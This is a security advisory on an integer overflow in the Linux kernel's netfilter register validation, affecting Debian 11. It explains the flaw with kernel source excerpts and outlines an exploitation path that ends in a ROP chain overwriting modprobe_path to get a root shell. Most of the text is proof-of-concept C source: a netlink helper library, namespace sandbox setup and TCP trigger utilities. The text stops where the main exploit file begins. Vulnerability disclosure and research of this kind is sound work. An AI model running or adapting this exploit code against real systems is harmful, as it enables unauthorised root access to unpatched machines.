SSD Advisory – Linux Kernel nft_validate_register_store Integer Overflow Privilege Escalation

Summary

A vulnerability in the Linux kernel allows local attackers to escalate privileges on affected installations. An attacker must first be able to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the netfilter subsystem. The issue results from an integer overflow in the bounds check that nft_validate_register_store applies to register numbers. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.

NOTE: This vulnerability was present only in Debian 11 due to a lack of backporting of the patch to the affected Kernel. The vulnerability was patched only in July 2023.

Credit

An independent security researcher working with SSD Secure Disclosure

Vendor Response

The vendor (Debian) released an updated kernel in July 2023: https://tracker.debian.org/news/1449040/accepted-linux-510179-3-source-into-oldstable-security

Affected Versions

Debian 11 (Linux Kernel 5.10)

Root Cause Analysis

The root cause of the vulnerability may be found within the nft_parse_register function, within the /net/netfilter/nf_tables_api.c file. The following function is used by the expression initialization code to determine which register of the state machine to use when evaluating the expression.

unsigned int nft_parse_register(const struct nlattr *attr)
{
    unsigned int reg;

    reg = ntohl(nla_get_be32(attr));
    switch (reg) {
    case NFT_REG_VERDICT...NFT_REG_4:
        return reg * NFT_REG_SIZE / NFT_REG32_SIZE;
    default:
        return reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00; // 1
    }
}
EXPORT_SYMBOL_GPL(nft_parse_register);

The value of the reg variable is entirely controlled by the attacker, so by taking the default branch of the switch statement [1] the attacker controls the result of the function as well.

When initialising an expression that modifies the value of a register, the nft_parse_register_store function is used to [2] load the register number and [3] validate that the selected register may be modified by the expression.

int nft_parse_register_store(const struct nft_ctx *ctx,
                 const struct nlattr *attr, u8 *dreg,
                 const struct nft_data *data,
                 enum nft_data_types type, unsigned int len)
{
    int err;
    u32 reg;

    reg = nft_parse_register(attr); // 2
    err = nft_validate_register_store(ctx, reg, data, type, len); // 3
    if (err < 0)
        return err;

    *dreg = reg;
    return 0;
}
EXPORT_SYMBOL_GPL(nft_parse_register_store);

The nft_validate_register_store function validates that the register selected does not influence [4] the execution flow of the state machine, then checks that the register selected is contained [5] within the 16 data registers available to the state machine.

static int nft_validate_register_store(const struct nft_ctx *ctx,
                       enum nft_registers reg,
                       const struct nft_data *data,
                       enum nft_data_types type,
                       unsigned int len)
{
    int err;

    switch (reg) {
    case NFT_REG_VERDICT: // 4
        if (type != NFT_DATA_VERDICT)
            return -EINVAL;

        if (data != NULL &&
            (data->verdict.code == NFT_GOTO ||
             data->verdict.code == NFT_JUMP)) {
            err = nf_tables_check_loops(ctx, data->verdict.chain);
            if (err < 0)
                return err;
        }

        return 0;
    default:
        if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE) 
            return -EINVAL;
        if (len == 0)
            return -EINVAL;
        if (reg * NFT_REG32_SIZE + len > // 5
            sizeof_field(struct nft_regs, data))
            return -ERANGE;

        if (data != NULL && type != NFT_DATA_VALUE)
            return -EINVAL;
        return 0;
    }
}

The check that the selected register lies within the available registers can be bypassed through an integer overflow if the reg variable is set to a value close to UINT_MAX. For instance, with reg set to FFFFFFF0h, the check multiplies the value by NFT_REG32_SIZE, which is 4. The mathematical result, 3FFFFFFC0h, is truncated to the 32-bit value FFFFFFC0h. Adding a length such as 50h makes the sum wrap around again, yielding a final value of 10h. This value passes the check even though the register number is far out of range. When the register number is then stored in the 8-bit dreg field it is truncated to F0h, so the expression addresses register slot 240, which permits reading and writing memory out of bounds.

An example of where this vulnerability is useful can be found in the code of the nft_payload expression, within the /net/netfilter/nft_payload.c file. When the expression is initialized, the destination register for the data copied from the incoming packet is computed [6]. By leveraging the vulnerability, it may be possible to write user-controlled data to the kernel stack.

static int nft_payload_init(const struct nft_ctx *ctx,
                const struct nft_expr *expr,
                const struct nlattr * const tb[])
{
    struct nft_payload *priv = nft_expr_priv(expr);

    priv->base   = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_BASE]));
    priv->offset = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_OFFSET]));
    priv->len    = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_LEN]));

    return nft_parse_register_store(ctx, tb[NFTA_PAYLOAD_DREG], // 6
                    &priv->dreg, NULL, NFT_DATA_VALUE,
                    priv->len);
}

Exploitation

To exploit this vulnerability, the nft_payload expression was used both to leak information from the stack, in order to bypass KASLR, and to write data [7] on the stack, in order to gain code execution.

void nft_payload_eval(const struct nft_expr *expr,
              struct nft_regs *regs,
              const struct nft_pktinfo *pkt)
{
    const struct nft_payload *priv = nft_expr_priv(expr);
    const struct sk_buff *skb = pkt->skb;
    u32 *dest = &regs->data[priv->dreg];
    int offset;

    if (priv->len % NFT_REG32_SIZE)
        dest[priv->len / NFT_REG32_SIZE] = 0;

    switch (priv->base) {
    case NFT_PAYLOAD_LL_HEADER:
        if (!skb_mac_header_was_set(skb))
            goto err;

        if (skb_vlan_tag_present(skb)) {
            if (!nft_payload_copy_vlan(dest, skb,
                           priv->offset, priv->len))
                goto err;
            return;
        }
        offset = skb_mac_header(skb) - skb->data;
        break;
    case NFT_PAYLOAD_NETWORK_HEADER:
        offset = skb_network_offset(skb);
        break;
    case NFT_PAYLOAD_TRANSPORT_HEADER:
        if (!pkt->tprot_set)
            goto err;
        offset = pkt->xt.thoff;
        break;
    default:
        BUG();
    }
    offset += priv->offset;

    if (skb_copy_bits(skb, offset, dest, priv->len) < 0) // 7
        goto err;
    return;
err:
    regs->verdict.code = NFT_BREAK;
}

By leveraging TCP packets to trigger the vulnerability, the exploit overwrites the return address to tcp_transmit_skb in order to redirect execution to a ROP chain that overwrites modprobe_path.

The exploit provided will start a shell with root privileges.

Proof of Concept

// nftpwn.c
#include "nftpwn.h"
#include <time.h>
#include <stdlib.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/flowtable.h>

nftpwn_conn * nftpwn_new_conn(bool is_batch, mnl_cb_t cb) {
  nftpwn_conn * conn;
  uint32_t seq;

  conn = (nftpwn_conn * ) calloc(1, sizeof(nftpwn_conn));
  if (conn == NULL) {
    return NULL;
  }
  conn -> buf = (char * ) calloc(MNL_SOCKET_BUFFER_SIZE, sizeof(char));
  if (conn -> buf == NULL) {
    goto err;
  }
  conn -> seq = time(NULL);
  conn -> is_batch = is_batch;
  if (is_batch) {
    conn -> batch = mnl_nlmsg_batch_start(conn -> buf, MNL_SOCKET_BUFFER_SIZE * sizeof(char));
    nftnl_batch_begin(mnl_nlmsg_batch_current(conn -> batch), conn -> seq++);
    mnl_nlmsg_batch_next(conn -> batch);
  } else {
    conn -> cb = cb;
    conn -> nlh = NULL;
  }
  return conn;
  err:
    free(conn);
  return NULL;
}

void nftpwn_delete_conn(nftpwn_conn * conn) {
  if (conn == NULL) {
    return;
  }
  free(conn -> buf);
  free(conn);
}

void nftpwn_send(nftpwn_conn * conn, uint32_t * seq_ptr) {
  int32_t ret;
  uint32_t portid, seq;
  struct mnl_socket * nl;

  if (conn == NULL) {
    return;
  }
  seq = 0;
  if (seq_ptr != NULL) {
    seq = * seq_ptr;
  }
  if (conn -> is_batch) {
    mnl_nlmsg_batch_next(conn -> batch);
    nftnl_batch_end(mnl_nlmsg_batch_current(conn -> batch), conn -> seq++);
    mnl_nlmsg_batch_next(conn -> batch);
  }

  nl = mnl_socket_open(NETLINK_NETFILTER);
  if (nl == NULL) {
    perror("mnl_socket_open");
    exit(EXIT_FAILURE);
  }

  if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
    perror("mnl_socket_bind");
    exit(EXIT_FAILURE);
  }

  portid = mnl_socket_get_portid(nl);

  if (conn -> is_batch) {
    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(conn -> batch), mnl_nlmsg_batch_size(conn -> batch)) < 0) {
      perror("mnl_socket_send");
      exit(EXIT_FAILURE);
    }
    mnl_nlmsg_batch_stop(conn -> batch);
  } else {
    if (mnl_socket_sendto(nl, conn -> nlh, conn -> nlh -> nlmsg_len) < 0) {
      perror("mnl_socket_send");
      exit(EXIT_FAILURE);
    }
  }

  ret = mnl_socket_recvfrom(nl, conn -> buf, MNL_SOCKET_BUFFER_SIZE * sizeof(char));
  while (ret > 0) {
    ret = mnl_cb_run(conn -> buf, ret, seq, portid, conn -> cb, NULL);
    if (ret <= 0) {
      break;
    }
    ret = mnl_socket_recvfrom(nl, conn -> buf, MNL_SOCKET_BUFFER_SIZE * sizeof(char));
  }
  if (ret == -1) {
    perror("error");
    exit(EXIT_FAILURE);
  }
  mnl_socket_close(nl);
  if (conn -> is_batch) {
    nftpwn_delete_conn(conn);
  }
}

void nftpwn_add_table(uint32_t family, char * table_name, uint8_t * user_data, uint32_t user_data_len) {
  nftpwn_conn * conn;
  uint32_t table_seq;
  struct nlmsghdr * nlh;
  struct nftnl_table * table;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  table = nftnl_table_alloc();
  nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, family);
  nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
  if (user_data != NULL) {
    nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, user_data, user_data_len);
  }
  table_seq = conn -> seq;
  nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, conn -> seq++);
  nftnl_table_nlmsg_build_payload(nlh, table);
  nftnl_table_free(table);

  nftpwn_send(conn, & table_seq);
}

void nftpwn_del_table(uint32_t family, char * table_name) {
  nftpwn_conn * conn;
  uint32_t table_seq;
  struct nlmsghdr * nlh;
  struct nftnl_table * table;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  table = nftnl_table_alloc();
  nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, family);
  nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
  table_seq = conn -> seq;
  nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELTABLE, family, NLM_F_ACK, conn -> seq++);
  nftnl_table_nlmsg_build_payload(nlh, table);
  nftnl_table_free(table);

  nftpwn_send(conn, & table_seq);
}

void nftpwn_add_flowtable(uint32_t family, char * table_name, char * name, uint32_t hooknum, uint32_t priority) {
  nftpwn_conn * conn;
  uint32_t flowtable_seq;
  struct nlmsghdr * nlh;
  struct nftnl_flowtable * table;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  table = nftnl_flowtable_alloc();
  nftnl_flowtable_set_u32(table, NFTNL_FLOWTABLE_FAMILY, family);
  nftnl_flowtable_set_str(table, NFTNL_FLOWTABLE_TABLE, table_name);
  nftnl_flowtable_set_str(table, NFTNL_FLOWTABLE_NAME, name);
  nftnl_flowtable_set_u32(table, NFTNL_FLOWTABLE_HOOKNUM, hooknum);
  nftnl_flowtable_set_u32(table, NFTNL_FLOWTABLE_PRIO, priority);
  flowtable_seq = conn -> seq;
  nlh = nftnl_flowtable_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_NEWFLOWTABLE, family, NLM_F_CREATE | NLM_F_ACK, conn -> seq++);
  nftnl_flowtable_nlmsg_build_payload(nlh, table);
  nftnl_flowtable_free(table);

  nftpwn_send(conn, & flowtable_seq);
}

void nftpwn_del_flowtable(uint32_t family, char * table_name, char * name) {
  nftpwn_conn * conn;
  uint32_t flowtable_seq;
  struct nlmsghdr * nlh;
  struct nftnl_flowtable * table;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  table = nftnl_flowtable_alloc();
  nftnl_flowtable_set_str(table, NFTNL_FLOWTABLE_TABLE, table_name);
  nftnl_flowtable_set_str(table, NFTNL_FLOWTABLE_NAME, name);
  flowtable_seq = conn -> seq;
  nlh = nftnl_flowtable_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELFLOWTABLE, family, NLM_F_ACK, conn -> seq++);
  nftnl_flowtable_nlmsg_build_payload(nlh, table);
  nftnl_flowtable_free(table);

  nftpwn_send(conn, & flowtable_seq);
}

void nftpwn_add_chain(uint32_t family, char * table_name, char * chain_name, nftpwn_base_chain_param * base_param) {
  nftpwn_conn * conn;
  uint32_t chain_seq;
  struct nlmsghdr * nlh;
  struct nftnl_chain * chain;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }
  chain = nftnl_chain_alloc();
  nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table_name);
  nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name);
  if (base_param) {
    nftnl_chain_set_u32(chain, NFTNL_CHAIN_HOOKNUM, base_param -> hooknum);
    nftnl_chain_set_u32(chain, NFTNL_CHAIN_PRIO, base_param -> prio);
  }
  chain_seq = conn -> seq;
  nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, conn -> seq++);
  nftnl_chain_nlmsg_build_payload(nlh, chain);
  nftnl_chain_free(chain);

  nftpwn_send(conn, & chain_seq);
}

void nftpwn_del_chain(uint32_t family, char * table_name, char * chain_name) {
  nftpwn_conn * conn;
  uint32_t chain_seq;
  struct nlmsghdr * nlh;
  struct nftnl_chain * chain;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  chain = nftnl_chain_alloc();
  nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table_name);
  nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name);
  chain_seq = conn -> seq;
  nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELCHAIN, family, NLM_F_ACK, conn -> seq++);
  nftnl_chain_nlmsg_build_payload(nlh, chain);
  nftnl_chain_free(chain);

  nftpwn_send(conn, & chain_seq);
}

void nftpwn_add_rule(uint32_t family, char * table_name, char * chain_name, struct nftnl_rule * rule) {
  nftpwn_conn * conn;
  struct nlmsghdr * nlh;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family);
  nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name);
  nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name);
  nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_NEWRULE, family, NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, conn -> seq++);
  nftnl_rule_nlmsg_build_payload(nlh, rule);
  nftnl_rule_free(rule);

  nftpwn_send(conn, NULL);
}

void nftpwn_get_rules(uint32_t family, char * table_name, char * chain_name, mnl_cb_t cb) {
  nftpwn_conn * conn;
  struct nftnl_rule * rule;

  conn = nftpwn_new_conn(false, cb);
  if (conn == NULL) {
    return;
  }

  rule = nftnl_rule_alloc();
  nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family);
  nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name);
  nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name);
  conn -> nlh = nftnl_rule_nlmsg_build_hdr(conn -> buf, NFT_MSG_GETRULE, family, NLM_F_DUMP, conn -> seq);
  nftnl_rule_nlmsg_build_payload(conn -> nlh, rule);
  nftpwn_send(conn, NULL);

  nftpwn_delete_conn(conn);
}

void nftpwn_del_rule(uint32_t family, char * table_name, char * chain_name, uint64_t handle) {
  nftpwn_conn * conn;
  struct nlmsghdr * nlh;
  struct nftnl_rule * rule;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  rule = nftnl_rule_alloc();
  nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family);
  nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name);
  nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name);
  nftnl_rule_set_u64(rule, NFTNL_RULE_HANDLE, handle);
  nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELRULE, family, NLM_F_ACK, conn -> seq++);
  nftnl_rule_nlmsg_build_payload(nlh, rule);
  nftnl_rule_free(rule);

  nftpwn_send(conn, NULL);
}

void nftpwn_del_rules(uint32_t family, char * table_name, char * chain_name) {
  nftpwn_conn * conn;
  struct nlmsghdr * nlh;
  struct nftnl_rule * rule;

  conn = nftpwn_new_conn(true, NULL);
  if (conn == NULL) {
    return;
  }

  rule = nftnl_rule_alloc();
  nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family);
  nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name);
  nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name);
  nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(conn -> batch), NFT_MSG_DELRULE, family, NLM_F_ACK, conn -> seq++);
  nftnl_rule_nlmsg_build_payload(nlh, rule);
  nftnl_rule_free(rule);

  nftpwn_send(conn, NULL);
}

void nftpwn_rule_add_payload(struct nftnl_rule * rule, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("payload");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_BASE, base);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_OFFSET, offset);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_LEN, len);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_DREG, dreg);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_payload_set(struct nftnl_rule * rule, uint32_t base, uint32_t offset, uint32_t len, uint32_t sreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("payload");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_BASE, base);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_OFFSET, offset);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_LEN, len);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_SREG, sreg);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_bitwise_fast(struct nftnl_rule * rule, uint32_t sreg, uint32_t dreg, uint32_t mask, uint32_t xor) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("bitwise");
  nftnl_expr_set_u32(expr, NFTA_BITWISE_LEN, sizeof(uint32_t));
  nftnl_expr_set_u32(expr, NFTA_BITWISE_SREG, sreg);
  nftnl_expr_set_u32(expr, NFTA_BITWISE_DREG, dreg);
  nftnl_expr_set_u32(expr, NFTA_BITWISE_MASK, mask);
  nftnl_expr_set_u32(expr, NFTA_BITWISE_XOR, xor);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_byteorder(struct nftnl_rule * rule, uint32_t op, uint32_t sreg, uint32_t dreg, uint32_t len, uint32_t size) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("byteorder");
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_OP, op);
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_SREG, sreg);
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_DREG, dreg);
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_LEN, len);
  nftnl_expr_set_u32(expr, NFTA_BYTEORDER_SIZE, size);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_cmp(struct nftnl_rule * rule, uint32_t op, uint32_t sreg, void * data, size_t data_len) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("cmp");
  nftnl_expr_set_u32(expr, NFTA_CMP_OP, op);
  nftnl_expr_set_u32(expr, NFTA_CMP_SREG, sreg);
  nftnl_expr_set_data(expr, NFTA_CMP_DATA, data, data_len);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_immediate_verdict(struct nftnl_rule * rule, uint32_t verdict, char * chain_name) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("immediate");
  nftnl_expr_set_u32(expr, NFTA_IMMEDIATE_DREG, 0);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_IMM_VERDICT, verdict);
  if (verdict == NFT_GOTO || verdict == NFT_JUMP) {
    nftnl_expr_set_str(expr, NFTNL_EXPR_IMM_CHAIN, chain_name);
  }
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_meta_get(struct nftnl_rule * rule, uint32_t key, uint32_t dreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("meta");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_META_DREG, dreg);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_META_KEY, key);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_meta_set(struct nftnl_rule * rule, uint32_t key, uint32_t sreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("meta");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_META_SREG, sreg);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_META_KEY, key);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_dynset(struct nftnl_rule * rule, char * set_name, uint32_t op, uint32_t sreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("dynset");
  nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, op);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, sreg);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_connlimit(struct nftnl_rule * rule, uint32_t count) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("connlimit");
  nftnl_expr_set_u32(expr, NFTNL_EXPR_CONNLIMIT_COUNT, count);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_flow_offload(struct nftnl_rule * rule, char * name) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("flow_offload");
  nftnl_expr_set_str(expr, NFTNL_EXPR_FLOW_TABLE_NAME, name);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_notrack(struct nftnl_rule * rule) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("notrack");
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_objref_map(struct nftnl_rule * rule, char * name, uint32_t id, uint32_t sreg) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("objref");
  nftnl_expr_set_str(expr, NFTNL_EXPR_OBJREF_SET_NAME, name);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_OBJREF_SET_ID, id);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_OBJREF_SET_SREG, sreg);
  nftnl_rule_add_expr(rule, expr);
}

void nftpwn_rule_add_lookup(struct nftnl_rule * rule, char * name, uint32_t id, uint32_t sreg, uint32_t dreg, uint32_t flags) {
  struct nftnl_expr * expr;

  expr = nftnl_expr_alloc("lookup");
  nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, name);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, id);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, sreg);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, dreg);
  nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_FLAGS, flags);
  nftnl_rule_add_expr(rule, expr);
}

// nftpwn.h
#ifndef __NFTPWN_H__
#define __NFTPWN_H__

#include <stdint.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>
#include <libmnl/libmnl.h>

typedef struct {
  char * buf;
  uint32_t seq;
  struct mnl_nlmsg_batch * batch;
  struct nlmsghdr * nlh;
  bool is_batch;
  mnl_cb_t cb;
}
nftpwn_conn;

typedef struct {
  uint32_t hooknum;
  uint32_t prio;
}
nftpwn_base_chain_param;

nftpwn_conn * nftpwn_new_conn(bool is_batch, mnl_cb_t cb);

void nftpwn_delete_conn(nftpwn_conn * conn);

void nftpwn_send(nftpwn_conn * conn, uint32_t * seq_ptr);

void nftpwn_add_table(uint32_t family, char * table_name, uint8_t * user_data, uint32_t user_data_len);

void nftpwn_del_table(uint32_t family, char * table_name);

void nftpwn_add_flowtable(uint32_t family, char * table_name, char * name, uint32_t hooknum, uint32_t priority);

void nftpwn_del_flowtable(uint32_t family, char * table_name, char * name);

void nftpwn_add_chain(uint32_t family, char * table_name, char * chain_name, nftpwn_base_chain_param * base_param);

void nftpwn_del_chain(uint32_t family, char * table_name, char * chain_name);

void nftpwn_add_rule(uint32_t family, char * table_name, char * chain_name, struct nftnl_rule * rule);

void nftpwn_get_rules(uint32_t family, char * table_name, char * chain_name, mnl_cb_t cb);

void nftpwn_del_rule(uint32_t family, char * table_name, char * chain_name, uint64_t handle);

void nftpwn_del_rules(uint32_t family, char * table_name, char * chain_name);

void nftpwn_rule_add_payload(struct nftnl_rule * rule, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg);

void nftpwn_rule_add_payload_set(struct nftnl_rule * rule, uint32_t base, uint32_t offset, uint32_t len, uint32_t sreg);

void nftpwn_rule_add_bitwise_fast(struct nftnl_rule * rule, uint32_t sreg, uint32_t dreg, uint32_t mask, uint32_t xor);

void nftpwn_rule_add_byteorder(struct nftnl_rule * rule, uint32_t op, uint32_t sreg, uint32_t dreg, uint32_t len, uint32_t size);

void nftpwn_rule_add_cmp(struct nftnl_rule * rule, uint32_t op, uint32_t sreg, void * data, size_t data_len);

void nftpwn_rule_add_immediate_verdict(struct nftnl_rule * rule, uint32_t verdict, char * chain_name);

void nftpwn_rule_add_meta_get(struct nftnl_rule * rule, uint32_t key, uint32_t dreg);

void nftpwn_rule_add_meta_set(struct nftnl_rule * rule, uint32_t key, uint32_t sreg);

void nftpwn_rule_add_dynset(struct nftnl_rule * rule, char * set_name, uint32_t op, uint32_t sreg);

void nftpwn_rule_add_connlimit(struct nftnl_rule * rule, uint32_t count);

void nftpwn_rule_add_flow_offload(struct nftnl_rule * rule, char * name);

void nftpwn_rule_add_notrack(struct nftnl_rule * rule);

void nftpwn_rule_add_objref_map(struct nftnl_rule * rule, char * name, uint32_t id, uint32_t sreg);

void nftpwn_rule_add_lookup(struct nftnl_rule * rule, char * name, uint32_t id, uint32_t sreg, uint32_t dreg, uint32_t flags);

#endif // __NFTPWN_H__

// utils.c
#ifndef __UTILS_H__
#define __UTILS_H__
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>

#define SERVER_PORT 6666

void hexdump(void * buf, int len) {
  unsigned char * p = (unsigned char * ) buf;

  for (int i = 0; i < len; i++) {
    printf("%02x ", p[i]);

    if ((i + 1) % 8 == 0) {
      printf("\n");
    }
  }
  printf("\n\n");
}

int setup_sandbox() {
  int ret = -1;
  int uid_fd = -1, gid_fd = -1, groups_fd = -1;

  if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
    goto end;
  }
  if ((uid_fd = open("/proc/self/uid_map", O_RDWR)) < 0) {
    goto end;
  }
  if (write(uid_fd, "0 1000 1", 8) < 0) {
    goto end;
  }
  if ((groups_fd = open("/proc/self/setgroups", O_RDWR)) < 0) {
    goto end;
  }
  if (write(groups_fd, "deny", 4) < 0) {
    goto end;
  }
  if ((gid_fd = open("/proc/self/gid_map", O_RDWR)) < 0) {
    goto end;
  }
  if (write(gid_fd, "0 1000 1", 8) < 0) {
    goto end;
  }
  ret = 0;
  end:
    if (gid_fd > 0) {
      close(gid_fd);
    }
  if (groups_fd > 0) {
    close(groups_fd);
  }
  if (uid_fd > 0) {
    close(uid_fd);
  }
  return ret;
}

void tcp_send(char * buf, size_t len) {
  int s;
  struct sockaddr_in sin = {};

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = inet_addr("127.0.0.1");
  sin.sin_port = htons(SERVER_PORT);

  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s < 0) {
    perror("socket");
    exit(EXIT_FAILURE);
  }
  if (connect(s, (struct sockaddr * ) & sin, sizeof(sin)) < 0) {
    perror("connect");
    exit(EXIT_FAILURE);
  }
  if (send(s, buf, len, 0) < 0) {
    perror("send");
    exit(EXIT_FAILURE);
  }
  close(s);
}

void tcp_server(void * handler) {
  int opt = 1, c, s;
  struct sockaddr_in sin = {};
  socklen_t sin_sz = sizeof(sin);

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = inet_addr("127.0.0.1");
  sin.sin_port = htons(SERVER_PORT);

  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s < 0) {
    perror("socket");
    exit(EXIT_FAILURE);
  }
  if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, & opt, sizeof(opt))) {
    perror("setsockopt");
    exit(EXIT_FAILURE);
  }
  if (bind(s, (struct sockaddr * ) & sin, sizeof(sin)) < 0) {
    perror("bind");
    exit(EXIT_FAILURE);
  }
  if (listen(s, 0) < 0) {
    perror("listen");
    exit(EXIT_FAILURE);
  }
  while (true) {
    c = accept(s, (struct sockaddr * ) & sin, (socklen_t * ) & sin_sz);
    if (c > 0) {
      ((void( * )(int)) handler)(c);
    }
  }
  close(s);
}

#endif // __UTILS_H__

// exploit.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <pthread.h>
#include <sys/stat.h>
#include <arpa/inet.h>
#include "nftpwn.h"
#include "utils.h"

#define TCP_WRITE_XMIT_OFF 0x7CA896

uint64_t kernel_base;

